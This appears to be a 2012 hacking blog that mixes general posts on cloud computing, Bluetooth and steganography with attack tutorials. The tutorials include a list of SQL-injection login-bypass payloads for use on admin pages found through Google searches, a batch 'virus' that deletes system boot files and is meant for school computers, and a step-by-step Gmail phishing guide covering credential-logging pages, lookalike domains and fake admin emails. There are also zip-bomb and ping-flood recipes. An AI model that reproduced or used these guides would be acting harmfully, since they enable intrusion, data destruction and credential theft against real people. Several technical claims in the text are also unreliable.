Sunday, March 25, 2012

SQL Injection Hacking Technique (Use It Using Proxy Other Wise Its a Dangerous Way To Hack)

First of all open Http://www.google.com then

Write in google search bar "admin login.asp" and then press the search tab.

Now a number of website opened with their admin log in page.

Now click on target website means click on the website you want to hack.Then a page with Username and Password has been opened.

Alot of website have Username=Admin.

Now the main part password if website is made on SQL server or SQL Script then the password is 1'or'1'='1 (including Apostraphy).

Actually it is a SQL injection which breaks the server firewall.Some website now gets developed in to Strong Code so It not work on them.But there are several injection other than above you may also check them

It may take time but you got your goal i.e you got administration of website you become honour.

Always use proxy otherwise you will be traced by Cyber Inspection and get some serious problem.

Other injection along with username (sometime it does not depend upon username just on injection) are listed below:
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

this might take a while to try all of them,
but, what the heq, its worth it.
New

Injection type:
Code:
user:admin (what ever you want)
pass:' or 1=1--


Code:
user:' or 1=1--
admin:' or 1=1--


Others:

Code:
'
'or''='
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Originally By HACKERX.

Saturday, March 24, 2012

I am a KILLER

I am going to tell you how you make a undetectable Batch Virus which delete the important file of your Operating System.
Batch program is a feature of Windows Operating System.Batch programing is a text on notepad which works as a Command in the Windows Operating System.

1: Open notepad and copy paste below write lines...
del boot
del autoexec.bat
del bootmgr
del config.sys
del pagefile.sys
shutdown -r -c "you had been infected by me you go to dad!!!!"
2: Save as by killer.bat
3: Do not run this virus on your system,copy paste and use in collage or school system.

happy hacking guys

zip of death



This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

1) Make a.txt file

2) Open and type the null character (alt + 255)

3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordinly

6) Open cmd.exe

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555

Just add some more and the file will expand amazingly

Make sure to not open this after

You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

what is cloud computing

What cloud computing really means

Cloud computing comes into focus only when you think about what IT always needs: a way to increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software. Cloud computing encompasses any subscription-based or pay-per-use service that, in real time over the Internet, extends IT’s existing capabilities.

Cloud computing is at an early stage, with a motley crew of providers large and small delivering a slew of cloud-based services, from full-blown applications to storage services to spam filtering. Yes, utility-style infrastructure providers are part of the mix, but so are SaaS (software as a service) providers such as Salesforce.com. Today, for the most part, IT must plug into cloud-based services individually, but cloud computing aggregators and integrators are already emerging.

InfoWorld talked to dozens of vendors, analysts, and IT customers to tease out the various components of cloud computing. Based on those discussions, here’s a rough breakdown of what cloud computing is all about:

1. SaaS
This type of cloud computing delivers a single application through the browser to thousands of customers using a multitenant architecture. On the customer side, it means no upfront investment in servers or software licensing; on the provider side, with just one app to maintain, costs are low compared to conventional hosting. Salesforce.com is by far the best-known example among enterprise applications, but SaaS is also common for HR apps and has even worked its way up the food chain to ERP, with players such as Workday. And who could have predicted the sudden rise of SaaS ”desktop” applications, such as Google Apps and Zoho Office?

2. Utility computing
The idea is not new, but this form of cloud computing is getting new life from Amazon.com, Sun, IBM, and others who now offer storage and virtual servers that IT can access on demand. Early enterprise adopters mainly use utility computing for supplemental, non-mission-critical needs, but one day, they may replace parts of the datacenter. Other providers offer solutions that help IT create virtual datacenters from commodity servers, such as 3Tera’s AppLogic and Cohesive Flexible Technologies’ Elastic Server on Demand. Liquid Computing’s LiquidQ offers similar capabilities, enabling IT to stitch together memory, I/O, storage, and computational capacity as a virtualized resource pool available over the network.

3. Web services in the cloud
Closely related to SaaS, Web service providers offer APIs that enable developers to exploit functionality over the Internet, rather than delivering full-blown applications. They range from providers offering discrete business services — such as Strike Iron and Xignite — to the full range of APIs offered by Google Maps, ADP payroll processing, the U.S. Postal Service, Bloomberg, and even conventional credit card processing services.

4. Platform as a service
Another SaaS variation, this form of cloud computing delivers development environments as a service. You build your own applications that run on the provider’s infrastructure and are delivered to your users via the Internet from the provider’s servers. Like Legos, these services are constrained by the vendor’s design and capabilities, so you don’t get complete freedom, but you do get predictability and pre-integration. Prime examples include Salesforce.com’s Force.com,Coghead and the new Google App Engine. For extremely lightweight development, cloud-basedmashup platforms abound, such as Yahoo Pipes or Dapper.net.

5. MSP (managed service providers)
One of the oldest forms of cloud computing, a managed service is basically an application exposed to IT rather than to end-users, such as a virus scanning service for e-mail or an application monitoring service (which Mercury, among others, provides). Managed security services delivered by SecureWorks, IBM, and Verizon fall into this category, as do such cloud-based anti-spam services as Postini, recently acquired by Google. Other offerings include desktop management services, such as those offered by CenterBeam or Everdream.

6. Service commerce platforms
A hybrid of SaaS and MSP, this cloud computing service offers a service hub that users interact with. They’re most common in trading environments, such as expense management systems that allow users to order travel or secretarial services from a common platform that then coordinates the service delivery and pricing within the specifications set by the user. Think of it as an automated service bureau. Well-known examples include Rearden Commerce and Ariba.

7. Internet integration
The integration of cloud-based services is in its early days. OpSource, which mainly concerns itself with serving SaaS providers, recently introduced the OpSource Services Bus, which employs in-the-cloud integration technology from a little startup called Boomi. SaaS provider Workday recently acquired another player in this space, CapeClear, an ESB (enterprise service bus) provider that was edging toward b-to-b integration. Way ahead of its time, Grand Central — which wanted to be a universal “bus in the cloud” to connect SaaS providers and provide integrated solutions to customers — flamed out in 2005.



Differences Between Dedicated Server, Cloud Computing and VPS

Many people still do not know or are confused when speaking of the major differences between Cloud Server Hosting, Virtual Private Servers (VPS) and Dedicated Servers. Starting with the most basic, you know what to serve?

Quite simply, all the three technologies are used to store data, host websites and structures of e- mail, besides running various applications and softwares. So if they serve for the same thing because they are different?

Each has a different characteristic, let us understand :

Dedicated Servers

It is a physical machine, usually allocated on a fully equipped data center and is totally dedicated to one customer who requires high reliability and high performance hardware ( processing, memory , etc.)… If the client needs more resources, you must purchase more hardware and manually install or exchange server. Its main advantage is the high performance and flexibility and its disadvantage is the high price and inability to upgrade / downgrade immediately. This is one of the best flexible solution than shared web hosting, as because the owner gets a total control over the hosting environment and every aspects of the dedicated hosting, which includes the selection of operating system, server hardware, etc… Some web hosting providers may provide the server administration for free, but usually, the client has to manage the server administration and management tasks.

Cloud Server Hosting (Cloud Computing)

Already Cloud Server is a fractionation of a number of resources available to multiple servers and storage arrays. Through an intelligent architecture, you can allocate these resources allows scalability without losing performance. Besides the economy and flexibility, there are numerous advantages to this technology.

Virtual Private Servers (VPS)

It is the fractionation of resources from one physical server, this fractionation being allocated to a single client. VPS is an ideal choice for businesses that requires same flexibility, reliability, security, root access, stability, etc… at much affordable rates that a dedicated server offers. In this technology there is no guarantee of processing and in case of hardware failures, client applications that depend on it will also fail, as there is integration servers like the Cloud.

We simplify the concepts so that everyone can understand, of course there are many other details, but overall this is it!
How Cloud Computing Can Be A Better Way | How is Cloud Computing Different than Traditional Applications?

In order for traditional applications to work properly, they require a data center with power, an office, cooling, servers, networks, bandwidth and storage. Even once you’ve met all those requirements, you need a professional to install them, configure them and make sure they’re running as they should. As much time, effort and money that goes into these programs by large businesses, you can only imagine the headache they pose for small businesses or individuals.

Cloud computing will help you run your business better and more efficiently for many reasons. Unlike many traditional business apps, applications that are cloud based can be up and running in a couple of days. Let’s face it – for your business to be efficient, you can’t have a lot of downtime. Cloud computing will also save you money because you don’t have to pay tons of money in employee wages to run your applications as well as many products to keep them running and updated. Any performance or security enhancements and upgrades your cloud based programs need, they’ll get automatically.

Another way you’ll save with cloud computing is by not having to constantly buy software and servers. They don’t take up as much of your IT resources as traditional applications.


Cloud Computing Market Will Reach $16.7 Billion by 2013

As more and more organizations starting to transition their data into the cloud and tap into web-based applications, the global cloud computing market is continuing to grow at high speed.Analyst firm 451 Market Monitor has predicted that it expects the cloud computing marketplace to reach $16.7 billion in revenue by 2013.

According to its report, the large and well-established software-as-a-service (SaaS (News - Alert)) category, cloud computing will grow from revenue of $8.7bn in 2010 to $16.7bn in 2013, registering a compound annual growth rate (CAGR) of 24 percent.

The research firm believes that the core cloud computing market will grow at much more rapid pace as the cloud increasingly becomes a mainstream IT strategy embraced by corporate enterprises and government agencies.

Excluding SaaS revenue, cloud-delivered platform and infrastructure services will grow from $964m in revenue in 2010 to $3.9bn 2013 - a CAGR of 60% - the report said.

The core market includes platform-as-a-service (PaaS) and infrastructure-as-a-service (IaaS) offerings, as well as the cloud-delivered software used to build and manage a cloud environment, which The 451 Group (News - Alert) calls 'software infrastructure as a service' (SIaaS).

Cloud-based storage will play a starring role in cloud growth, accounting for nearly 40 percent of the core cloud pie in 2010. "We view storage as the most fertile sector, and predict that cloud storage will experience the strongest growth in the cloud platforms segment," the report says.

In June, Gartner said worldwide cloud computing services market is poised for strong growth and its revenue might reach USD 148.8 billion by 2014.

Thursday, March 22, 2012

now stop copy paste from your blog

add this script

<!--Disable Copy And Paste-->
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>

Tuesday, March 20, 2012

How to Detect Anonymous IP Addresses

As the fraudsters are now becoming more sophisticated in bypassing the Geo-location controls by using proxies (Anonymous IPs) to spoof their IP address, it has become very much necessary to come up with a means for detecting the proxies so that the authenticity of the users can be verified. Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain the online privacy. However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP.
 
1. Credit Card Frauds
For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.
 
2. Bypass Website Country Restrictions
Some website services are restricted to users form only a selected list of countries. For example, a paid survey may be restricted only to countries like United States and Canada. So a user from say China may use a proxy so as to make his IP appear to have come from U.S. so that he can earn from participating in the paid survey.
 

Proxy Detection Services

 
So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.
 
How Proxy Detection Works?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm it’s authenticity.
The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.

steanography

Ever wondered to know how to hide secret messages in images, audio and video files? Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data.

What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.
The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.

What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.
Eventhough steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Roumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.

How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.

Hack BSNL Broadband for Speed

If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:
208.67.222.222
208.67.220.220Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.

How to Lock the folders

You can lock and unlock your folder with this simple trick !
Procedure :
1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !

footprinting

¥ What Is Footprinting?
Footprinting is the first and most convenient way that hackers use to gather information
about computer systems and the companies they belong to. The purpose of footprinting to
learn as much as you can about a system, it's remote access capabilities, its ports and
services, and the aspects of its security.
In order to perform a successful hack on a system, it is best to know as much as you can,
if not everything, about that system. While there is nary a company in the world that
isn't aware of hackers, most companies are now hiring hackers to protect their systems.
And since footprinting can be used to attack a system, it can also be used to protect it.
If you can find anything out about a system, the company that owns that system, with the
right personell, can find out anything they want about you.
In this talk, I will explain what the many functions of footprinting are and what they do.
I'll also footprint everyone's favorite website, just to see how much info we can get on
Grifter.
¥ Open Source Footprinting
Open Source Footprinting is the easiest and safest way to go about finding information
about a company. Information that is available to the public, such as phone numbers,
addresses, etc. Performing whois requests, searching through DNS tables, and scanning
certain IP addresses for open ports, are other forms of open source footprinting. Most
of this information is fairly easy to get, and getting it is legal, legal is always good.
Most companies post a shit load of information about themselves on their website. A lot
of this information can be very useful to hackers and the companies don't even realize it.
It may also be helpful to skim through the webpage's HTML source to look for comments.
Comments in HTML code are the equivalent to the small captions under the pictures in high
school science books. Some comments found in the HTML can hold small tid-bits of info
about the company, otherwise not found anywhere else.
¥ Network Enumeration
Network Enumeration is the process of identifying domain names and associated networks.
The process is performing various queries on the many whois databases found on the
internet. The result is the hacker now having the information needed to attack the system
they are learning about. Companie's domain names are listed with registrars, and the
hacker would simply query the registrar to obtain the information they are looking for.
The hacker simply needs to know which registrar the company is listed with. There are
five types of queries which are as follows:
Registrar Query: This query gives information on potential domains matching the
target.
Organizational Query: This is searching a specific registrar to obtain all
instances of the target's name. The results show many different domains associated
with the company.
Domain Query: A domain query is based off of results found in an organizational
query. Using a domain query, you could find the company's address, domain name,
administrator and his/her phone number, and the system's domain servers. The
administrative contact could be very useful to a hacker as it provides a purpose
for a wardialer. This is also where social engineering comes into play. But
that's a talk for another time. Many administrators now post false phone numbers
to protect themselves from this.
Network Query: The fourth method one could use the American Registry for Internet
Numbers is to discover certain blocks owned by a company. It's good to use a
broad search here, as well as in the registrar query.
POC Query: This query finds the many IP adresses a machine may have.
¥ DNS Interrogation
After gathering the information needed using the above techniques, a hacker would begin to
query the DNS. A common problem with system adminstrators is allowing untrusted, or worse,
unknown users, to perform a DNS Zone Transfer. Many freeware tools can be found on the
internet and can be used to perform DNS interrogation. Tools such as nslookup, for PC, and
AGnet Tools, for Mac, are some common programs used for this.
¥ Other Helpful Techniques Used In Footprinting
Ping Sweep: Ping a range of IP addresses to find out which machines are awake.
TCP Scans: Scan ports on machines to see which services are offered. TCP scans
can be performed by scanning a single port on a range of IPs, or by scanning a
range of ports on a single IP. Both techniques yeild helpful information.
UDP Scans: Send garbage UDP packets to a desired port. I normally don't perform
UDP scans a whole lot because most machines respond with an ICMP 'port unreachable'
message. Meaning that no service is available.
OS Indentification: This involves sending illegal ICMP or TCP packets to a machine.
The machine responds with unique invalid inputs and allows the hacker to find out what the
target machine is running.

how to change administer password

his is useful for many occasions such as if you forget the password to your primary account on your computer but still have access to another 0ne or if you simply want to prank your brother.

This has been tested on both Windows XP and Windows 7.

For this to work you must have access to another account because you have to use Command Prompt or CMD to change the password.

Here is how to do it:
  • Open Command Prompt (CMD) by going to Start -> Run -> cmd.exe
  • Type in ‘net users’. This will show you a list of all the accounts on the computer. This is just to check and make sure you know the EXACT username of the account you want to change the password for.
  • Next, you need to type in ‘net user (whatevertheusernameis)

    Next you shall get a prompt asking you for the new password:

    Finally it shall ask you to repeat the new password, click enter and BAM, you have now changed the password without knowing the original one.

how to crash a website!!!!!

first of all open cmd
type cmd in run then type ping (website) and then enter

by this u will get ip address
xx.xxx.xxx

then again type ping (ip address) -s -t 1000

then wait ur website is pinging and wait and wait
till pinging completes

TADA U CRASHED A WEBSITE

WARNING : DO ON YOUR OWN RISK

ps 2 emulator (play ps2 games on ur pc )!!!!!!!!

what is java script

JavaScript is a programming language used to make web pages interactive. It runs on your visitor's computer and doesn't require constant downloads from your website. JavaScript is often used to create polls and quizzes. What Do I Need to Run JavaScript?: JavaScript support is built right into all the major web browsers, including Internet Explorer, Firefox and Safari. Provided that the visitors to your site are using web browsers that support JavaScript (most do) and have JavaScript enabled (it is by default), then your JavaScript will run when they visit the page. Do I Need to Learn Javascript to Be Able to Use It?: No. There are plenty of pre-written JavaScripts that people have made available for you to plug straight into your web page. All you need to know to be able to use such scripts is how to paste the supplied code into the required places in your web page. What Do I Need to Write JavaScript?: JavaScript is an interpreted language, so no special program is required to create usable code. Any plain text editor such as Notepad (one of the Accessories that comes in Windows) is quite satisfactory for being able to write JavaScript. That said, an editor that colorizes the code to make it easier to see what is what makes it easier to find your mistakes. My Javascript Formatter also can reformat your script to make errors easier to spot. Can I Use HTML Instead of JavaScript?: No. HTML and JavaScript are two completely different things. HTML is a markup language designed for defining static web page content. JavaScript is a programming language designed for performing dynamic tasks. Sometimes the distinction is confusing because JavaScript code can go in the same file as HTML. (More on that in a minute.) Can I Use PHP or Some Other Server-Side Language Instead of JavaScript?: Perhaps. It depends where the code needs to run. If it can run before the page loads, you can use a server-side language. If it has to run after the page has loaded, then you must use JavaScript, as this is the only scripting language supported by all web browsers that support client-side scripting. Does the Javascript Go in the Same File as the HTML?: It can, but your scripts will be more easily reused on multiple pages of your site if you place them in separate files. (Using a .JS extension helps identify them as Javascript.) You then just link the JavaScript to your HTML by inserting a script. The same JavaScript can then be added to several pages just by adding the appropriate tag into each of the pages to set up the link.

Monday, March 19, 2012

how to hack gmail accoucnt

Most of us thinks that phishing is very common technique and anyone can detect it. But doing it in smart Ways means its 100% undetectable and victim has to do it for must. Also why I haven't explained this with earlier post ie How to hack an Email Account because this Hack is specific for specific website means you need specific phisher for each website and also you have to take care about creating your account on web hosting accordingly. So guys If you Want to Learn How to Hack Gmail Account or Password then tighten your belts and get ready for awesome hacking experience..

NOTE: This is for Educational Purpose Only. We are not responsible for any damage done by You.
Things That you Need for Hacking Gmail Account Password:
1. Gmail Phisher
2. Free Web hosting Site
3. Little bit of manual Work :p

Introduction to Phishing
If you know little bit of Hacking then Its must for you know About Phishing i.e What is Phishing and how it works and most important How you can protect yourself from getting into the Trap. I will try to explain all of these in my article.
First of all What are Phish pages and what is phishing?? Phish pages are basically the fake pages or virtual pages that looks similar to the original website Page. The only difference is the batch program running in the background i.e Original Webpage sends requests to Gmail server while Phish Page sends request to hacker's php server. Now Phishing is a password hacking technique commonly used by hackers using phish pages that looks similar to original web page. The only difference is the URL in the address bar so Guys One Important Tip for you all always check the Address bar while going to any website .
Now What is Smart Phishing, Normal phishing page sends the password to hacker but it doesn't redirects the page to original website but smart phishing does. Means victim can never know what really happened and his account is got hacked. He will only think that he has entered the wrong password as in second attempt the web page is original and he will be able to login and the most fantastic thing is that the original redirected page has username already entered in it that makes it even smarter.
Now lets come to how it works?? When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it . So when the person clicks on try again it redirects to the actual URL so that the victim does not know that your site is a fake site and gets his gmail.com password hacked.

HACKING GMAIL ACCOUNT STEPWISE:

1. First of all download the Gmail Phisher.

Download

2. Extract the rar file now you will get three files as given below:
gmail.html
log.txt
mail.php
3. Upload all the Three files to any of the free Web hosting server. Remember while creating the account on these servers try the username as nearer as possible to the original URL like mail.gmaile or maile.gmall etc.. As its the most crucial step. Some Free Web hosting servers are given below you can also find few more for yourself.
www.yourfreehosting.net
www.esmartstart.com
www.110mb.com
www.drivehq.com
www.t35.com
4. Once you have uploaded all the three files to web hosting server now you have to send these to your victim. This is the most important step regarding smart phishing technique.
Most People use same password for orkut and gmail and here is the main hack lies. What you have to do you have to send the HTML email to the victim which looks similar to the Orkut scrap to his email you can easily do this using simple editing to the existing mail. Just you have to change the link with your phish link and content according to the person likings so that he will surely come inside the trap.
Another technique is that you can send him a request to join a particular community in the format orkut does.
And Last but the most important one Send him mail from Gmail Admin such that "We have seen illegal activity from your account and you need to verify your account and your account is temporarily disabled after this login. To unlock your account Verify your Email and in that link put your Phish link. Now Guys you all will came to know How it works. If you want to Protect yourself its must that you should know what techniques a Hacker can use to hack your Gmail Account.

5. Now After sending phisher to victim, once the user logs in to his Gmail account using your Phisher, his user ID and password are ours..And these are stored in log.txt What you have to do is just refresh your Web hosting account files.


Thats all Now you have hacked the password of victim. I hope you all have Liked It.

How to Protect Your Gmail Account From Phisher??
1. Always check the URL in the address bar before entering username and password.
2. Never follow any link from your email and any website until u have confirmed the Address bar URL.
3. Never Follow spam mails and "Win lottery or Cash" mails.

Saturday, March 17, 2012

why hackers make virus

With the development of computer technology, developing the technology and sophistication a virus. Even now the spread of the virus can occur more quickly to the world through the internet access more extensive. Now we will try to actually find out why and what cause someone is always working to create a new virus to spread throughout the world each day. At least we got 9 reasons to explain: 1. Used as a research objects In an online interview. Dark Avenger, a virus maker from Bulgaria said: “I make a computer virus because I just heard of a computer virus and want to know about it, but there are no people around me who can explain “what is it?”. So I decide to create my own virus. I create some codes in it which can damage any data or files. I apologize about it. I started in September 1988. “ 2. Does not want to lose with the Antivirus vendor Some are saying that with the development of antivirus technology, the making of the virus motivated to make the virus more “violent” and more. He does not want to be a loser and give up with the latest antivirus technology. 3. Lack of employment for self-taught programmer There is so many talented and smart programmers, but still out of luck because the IT company does not need any programmer which have not certified profession. Most of the programme is to obtain knowledge of the self-taught, whereas in almost all IT companies need an academic degree as a condition in which they work. A virus maker says “I make a virus just because do not know anything else that I need to make with my programming ability.” 4. Many Operating System or other software are vulnerable Too many security holes in the operating system and software – the software can make a certain someone tempted to make a virus by exploiting those vulnerable software as a media for the distribution of the infection. For example: In Microsoft Office which has a security hole tempted someone to create a ‘Macro virus. A security hole in Internet Explorer tempted someone to create a ‘Worm’ that spread rapidly to the world. 5. Need a famous and attention oriented Many viruses which displays a text and images in the hope that the creator and his virus will become to famous throughout the world. Initially this virus is not harmful. But in its development, there are many groups appear separately which always competitive and maintain their existences with other virus makers. Those groups will always keep generating a new virus that more powerful than before, which is not detected and spread quickly. Groups of antivirus makers that is very popular at this time are: - CodeBreakers, Genesis (UK) - Nuke, Viper (United States) - Trident (Netherlands) Instead of creating a virus, they also reinforce the existence and create magazine and an online article about virus. They are CodeBreaker with CodeBreaker Magazine and NuKE with NuKE Info Journal. 6. Steal and destroy data There are so many viruses that are made intentionally damage data to someone. There are viruses that can format the hard drive up to more than 2 times to ensure to destroy the data. Many viruses are also made to steal any data from someone. Suppose the current popularity is a virus that is made to steal passwords and data by uploading the data to the suspect’s computer. This type of virus is often used to steal data opponent, otherwise business opponent. 7. Revenge and disappointed There are some of viruses makers will do anything for his revenge as his disappointed from his live. They will make a virus which will show their expression about their live. Usually they uses a text and image displayed appear in the virus. 8. Kiddiez If we try browsing in Google with the keyword “virus generator”, we will find many programs and software that can create a virus which is instantly, even by people who do not understand programming, though. By this Virus Generator, we can make the virus and its variant easily. For example: vbswg (virus generator) made by [k] Alamar from Argentina. For those who make a virus using this tool, they will called as a kiddiez or children. 9. Annoying This is the reason that is often answered by many of the virus maker. Usually they make a virus to spend their spare time and make it only because it annoying.

hide ur ip

http://www.mediafire.com/?nf159d0o2z4d

Friday, March 16, 2012

how Bluetooth works

Harald Bluetooth was a Viking king of Denmark between 940 and 981. Legend has it that as well as having stained teeth, he was good at getting people to talk to one another. Whatever the truth of the matter the two main companies involved in the development of Bluetooth, Ericsson and Nokia, decided to honour a Nordic hero in the name they chose for their project back in 1994. Frequency hopping The huge growth of wireless devices started even before Bluetooth came along. Nearly all of them use one small section of the radio spectrum – the Industrial, Scientific and Medical band. The ISM band occupies the frequency range 2400-2483.5MHz and it is already used by outside broadcast links, radio frequency identification, microwave ovens, WiFi networks and some types of lighting. As you might expect, the first problem that the Bluetooth designers had to overcome was finding a way of avoiding interference. The problem is all the more difficult because devices that work in the ISM band have to be low power. There are three classes of Bluetooth devices. Class 1 transmits using 100mW of power and has a range of 100m. Most mobile Bluetooth devices are Class 3, which use just 1mW to save batteries, but only achieve a 10m range. Class 2 devices fall between these two and transmit at 2.5mW. The low power and limited range is also a way to allow many Bluetooth devices to work without interfering with one another. To avoid interference from other ISM devices Bluetooth uses a sophisticated frequency hopping technique. The ISM band is spit into 79 channels each 1MHz wide. The transmitter in a Bluetooth device changes its channel 1600 times a second in a pseudo random way. This is called Frequency Hopping Spread Spectrum (FHSS) and it was invented by the military to make its communications less prone to interference, jamming and eavesdropping. Using FHSS a Bluetooth device can create a two-way radio link capable of working at up to 720Kbits per second. Data is sent in packets containing up to 2745 bits. If a packet is lost due to interference on a channel then it is automatically retransmitted again on another channel as the frequency hopping occurs. Keeping in step This is all very well but how do two devices manage to communicate when they are changing the channels used in a seemingly random way? The answer is that when a Bluetooth device isn’t connected to another device it doesn’t frequency hop at the top speed of 1600 hops per second. Instead is uses a slow scan of the available channels in an attempt to find other Bluetooth devices. Thus when two Bluetooth devices are brought into each other’s range they will eventually notice each other and make a connection. This is called “paging”. Each device uses one of the frequency hopping channels to transmit an “I’m here” message and it changes the transmission channel every 312.5 seconds. At the same time each device listens on a channel which it changes every 1.28 seconds. You can see that in principle it could take a few minutes for the two devices to hit on the same transmit and receive frequency. Once they do hit on a common frequency, the device that “found” the other device becomes a master and the other becomes a slave. Then the master sends the slave device a frequency hopping scheme and they start to change frequency in step with each other at full speed. Notice that any Bluetooth device is capable of being a master or a slave. The radio link established between a master and a slave can be used for up to three simultaneous voice channels – each working at 64Kbits per second – or an asynchronous data channel. The data channel can be asymmetrical 720Kbps with a return channel of 57Kbps or symmetrical at 433.9Kbps. Piconet and Scatternet A piconet and a scatternet are built of master and slave devices (click to enlarge) When two Bluetooth devices notice each other they create a network – called a Piconet - consisting of one master and one slave. If another Bluetooth device is detected then it joins the network as another slave. All of the devices connect to a piconet use the same frequency hopping schedule and are controlled by the master. The channel is divided into 625 microsecond time slots and its shared between the master and the slaves using the simple rule that the master transmits on even time slots and the slaves transmit in odd time slots. The Bluetooth software creates two types of data transfers between devices in a piconet– synchronous (SCO) and asynchronous (ACL). SCO is a 64Kbps point-to-point transfer between the master and a single slave. A piconet can have three SCO connections active at any one time. To make sure that the capacity is available for an SCO link the master reserves time slots. An ACL connection can use any time slot not reserved for an SCO link. It can be used as a point-to-point connection but the master can also broadcast data to multiple slaves. Another difference is that a slave can only transmit data when requested to do so by the master. As you can see a piconet is sophisticated enough to service the needs of a wide variety of different types of hardware including phones, PDAs, printers and so on. A piconet can have up to seven slaves but in principle the number can be extended to 255 slaves by the use of “virtual” connections. In this case all but seven of the slaves are active at any one time but which particular seven are active can be changed every 2ms. Another way to increase the size of a Bluetooth network is to create a “Scatternet”. The master in one piconet can be a slave in another so linking 